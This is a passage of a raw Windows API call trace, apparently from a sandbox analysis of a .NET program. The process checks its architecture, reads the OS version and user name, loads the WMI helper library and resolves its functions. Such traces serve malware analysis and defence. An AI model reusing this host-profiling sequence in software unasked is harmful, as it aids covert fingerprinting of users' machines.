cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64Process\x0fk\x89\x871\x86 «ðkhö\x19", lpUsedDefaultChar=0x0) returned 14 [0254.541] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0254.542] GetCurrentProcess () returned 0xffffffff [0254.542] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f358 | out: Wow64Process=0x19f358*=1) returned 1 [0254.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2f4 | out: phkResult=0x19f2f4*=0x3b8) returned 0x0 [0254.553] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ProductName", lpReserved=0x0, lpType=0x19f314, lpData=0x0, lpcbData=0x19f310*=0x0 | out: lpType=0x19f314*=0x1, lpData=0x0, lpcbData=0x19f310*=0x1e) returned 0x0 [0254.553] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ProductName", lpReserved=0x0, lpType=0x19f314, lpData=0x222e63c, lpcbData=0x19f310*=0x1e | out: lpType=0x19f314*=0x1, lpData="Windows 10 Pro", lpcbData=0x19f310*=0x1e) returned 0x0 [0254.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2f4 | out: phkResult=0x19f2f4*=0x3bc) returned 0x0 [0254.554] RegQueryValueExW (in: hKey=0x3bc, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x19f314, lpData=0x0, lpcbData=0x19f310*=0x0 | out: lpType=0x19f314*=0x0, lpData=0x0, lpcbData=0x19f310*=0x0) returned 0x2 [0255.019] CoTaskMemAlloc (cb=0x804) returned 0x6bdb10 [0255.019] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6bdb10, nSize=0x19f37c | out: lpNameBuffer="XC64ZB\\RDhJ0CNFevzX", nSize=0x19f37c) returned 0x1 [0255.020] CoTaskMemFree (pv=0x6bdb10) [0255.020] GetUserNameW (in: lpBuffer=0x19f110, pcbBuffer=0x19f388 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f388) returned 1 [0255.412] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c0 [0255.415] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebd8 | out: ppv=0x19ebd8*=0x601a94) returned 0x0 [0255.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19de64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0255.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x19e368, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll\x05ò\x18Îe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 63 [0255.468] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6d3c0000 [0255.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x19e39c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 13 [0255.629] GetProcAddress (hModule=0x6d3c0000, lpProcName="ResetSecurity") returned 0x6d3c26fe [0255.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x19e39c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 11 [0255.640] GetProcAddress (hModule=0x6d3c0000, lpProcName="SetSecurity") returned 0x6d3c2740 [0255.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x19e398, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 18 [0255.648] GetProcAddress (hModule=0x6d3c0000, lpProcName="BlessIWbemServices") returned 0x6d3c1e89 [0255.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x19e390, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 24 [0255.658] GetProcAddress (hModule=0x6d3c0000, lpProcName="BlessIWbemServicesObject") returned 0x6d3c1edb [0255.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x19e398, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 17 [0255.670] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetPropertyHandle") returned 0x6d3c23d4 [0255.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x19e398, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValueÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 18 [0255.676] GetProcAddress (hModule=0x6d3c0000, lpProcName="WritePropertyValue") returned 0x6d3c2837 [0255.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x19e3a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 5 [0255.682] GetProcAddress (hModule=0x6d3c0000, lpProcName="Clone") returned 0x6d3c1f2d [0255.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x19e398, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 15 [0255.687] GetProcAddress (hModule=0x6d3c0000, lpProcName="VerifyClientKey") returned 0x6d3c27d4 [0255.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x19e398, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 15 [0255.690] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetQualifierSet") returned 0x6d3c2435 [0255.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x19e3a4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 3 [0255.691] GetProcAddress (hModule=0x6d3c0000, lpProcName="Get") returned 0x6d3c22f4 [0255.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x19e3a4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 3 [0255.695] GetProcAddress (hModule=0x6d3c0000, lpProcName="Put") returned 0x6d3c24de [0255.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x19e3a4, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 6 [0255.696] GetProcAddress (hModule=0x6d3c0000, lpProcName="Delete") returned 0x6d3c2151 [0255.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x19e3a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 8 [0255.699] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetNames") returned 0x6d3c23a2 [0255.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x19e398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 16 [0255.702] GetProcAddress (hModule=0x6d3c0000, lpProcName="BeginEnumeration") returned 0x6d3c1e63 [0255.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x19e3a4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 4 [0255.703] GetProcAddress (hModule=0x6d3c0000, lpProcName="Next") returned 0x6d3c24a3 [0255.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x19e39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumerationÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 14 [0255.704] GetProcAddress (hModule=0x6d3c0000, lpProcName="EndEnumeration") returned 0x6d3c21e2 [0255.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x19e390, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 23 [0255.706] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetPropertyQualifierSet") returned 0x6d3c241f [0255.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x19e3a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 5 [0255.707] GetProcAddress (hModule=0x6d3c0000, lpProcName="Clone") returned 0x6d3c1f2d [0255.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x19e39c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 13 [0255.707] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetObjectText") returned 0x6d3c23be [0255.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x19e398, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 17 [0255.708] GetProcAddress (hModule=0x6d3c0000, lpProcName="SpawnDerivedClass") returned 0x6d3c2786 [0255.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x19e39c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 13 [0255.710] GetProcAddress (hModule=0x6d3c0000, lpProcName="SpawnInstance") returned 0x6d3c279c [0255.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x19e3a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 9 [0255.710] GetProcAddress (hModule=0x6d3c0000, lpProcName="CompareTo") returned 0x6d3c1fad [0255.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x19e398, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 17 [0255.712] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetPropertyOrigin") returned 0x6d3c2409 [0255.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x19e39c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 12 [0255.713] GetProcAddress (hModule=0x6d3c0000, lpProcName="InheritsFrom") returned 0x6d3c2448 [0255.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x19e3a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 9 [0255.713] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetMethod") returned 0x6d3c235a [0255.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x19e3a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 9 [0255.714] GetProcAddress (hModule=0x6d3c0000, lpProcName="PutMethod") returned 0x6d3c25fa [0255.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x19e39c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 12 [0255.717] GetProcAddress (hModule=0x6d3c0000, lpProcName="DeleteMethod") returned 0x6d3c2164 [0255.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x19e394, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumerationÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 22 [0255.717] GetProcAddress (hModule=0x6d3c0000, lpProcName="BeginMethodEnumeration") returned 0x6d3c1e76 [0255.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x19e3a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethodÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 10 [0255.718] GetProcAddress (hModule=0x6d3c0000, lpProcName="NextMethod") returned 0x6d3c24c2 [0255.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x19e394, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumerationD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 20 [0255.719] GetProcAddress (hModule=0x6d3c0000, lpProcName="EndMethodEnumeration") returned 0x6d3c21f2 [0255.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x19e394, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 21 [0255.719] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetMethodQualifierSet") returned 0x6d3c238c [0255.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x19e398, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 15 [0255.720] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetMethodOrigin") returned 0x6d3c2376 [0255.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x19e398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 16 [0255.720] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_Get") returned 0x6d3c264c [0255.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x19e398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 16 [0255.722] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_Put") returned 0x6d3c269a [0255.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x19e394, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 19 [0255.723] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_Delete") returned 0x6d3c2629 [0255.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x19e394, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 21 [0255.723] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_GetNames") returned 0x6d3c2668 [0255.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x19e38c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 29 [0255.725] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6d3c2616 [0255.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x19e398, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 17 [0255.725] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_Next") returned 0x6d3c267e [0255.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x19e38c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 27 [0255.726] GetProcAddress (hModule=0x6d3c0000, lpProcName="QualifierSet_EndEnumeration") returned 0x6d3c263c [0255.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x19e390, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 23 [0255.727] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetCurrentApartmentType") returned 0x6d3c2435 [0255.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x19e394, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 20 [0255.729] GetProcAddress (hModule=0x6d3c0000, lpProcName="GetDemultiplexedStub") returned 0x6d3c2313 [0255.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x19e394, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 21 [0255.731] GetProcAddress (hModule=0x6d3c0000, lpProcName="CreateInstanceEnumWmi") returned 0x6d3c20db [0255.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x19e398, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmiÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 18 [0255.734] GetProcAddress (hModule=0x6d3c0000, lpProcName="CreateClassEnumWmi") returned 0x6d3c2065 [0255.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x19e39c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 12 [0255.735] GetProcAddress (hModule=0x6d3c0000, lpProcName="ExecQueryWmi") returned 0x6d3c227b [0255.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x19e390, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmiD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 24 [0255.740] GetProcAddress (hModule=0x6d3c0000, lpProcName="ExecNotificationQueryWmi") returned 0x6d3c2202 [0255.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x19e39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmiÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 14 [0255.740] GetProcAddress (hModule=0x6d3c0000, lpProcName="PutInstanceWmi") returned 0x6d3c257a [0255.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x19e39c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi\x05D\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 11 [0255.742] GetProcAddress (hModule=0x6d3c0000, lpProcName="PutClassWmi") returned 0x6d3c24fa [0255.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x19e390, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObjectD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 24 [0255.743] GetProcAddress (hModule=0x6d3c0000, lpProcName="CloneEnumWbemClassObject") returned 0x6d3c1f40 [0255.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x19e398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmiD\x1aÎe\x89\x871\x86 «ðk`æ\x19", lpUsedDefaultChar=0x0) returned 16 [0255.744] GetProcAddress (hModule=0x6d3c0000, lpProcName="ConnectServerWmi") returned 0x6d3c1fc3 [0255.803] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19ebd4 | out: ppvObject=0x19ebd4*=0x0) returned 0x80004002 [0255.803] IUnknown:Release (This=0x601a94) returned 0x0 [0255.822] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x19e82c | out: lpiid=0x19e82c) returned 0x0 [0255.828] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e540 | out: ppv=0x19e540*=0x65c628) returned 0x0 [0256.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x65c628, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e758 | out: ppvObject=0x19e758*=0x0) returned 0x80004002 [0256.695] WbemDefPath:IClassFactory:CreateInstance (in: This=0x65c628, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e76c | out: ppvObject=0x19e76c*=0x6619b0) returned 0x0 [0256.696] WbemDefPath:IUnknown:Release (This=0x65c628) 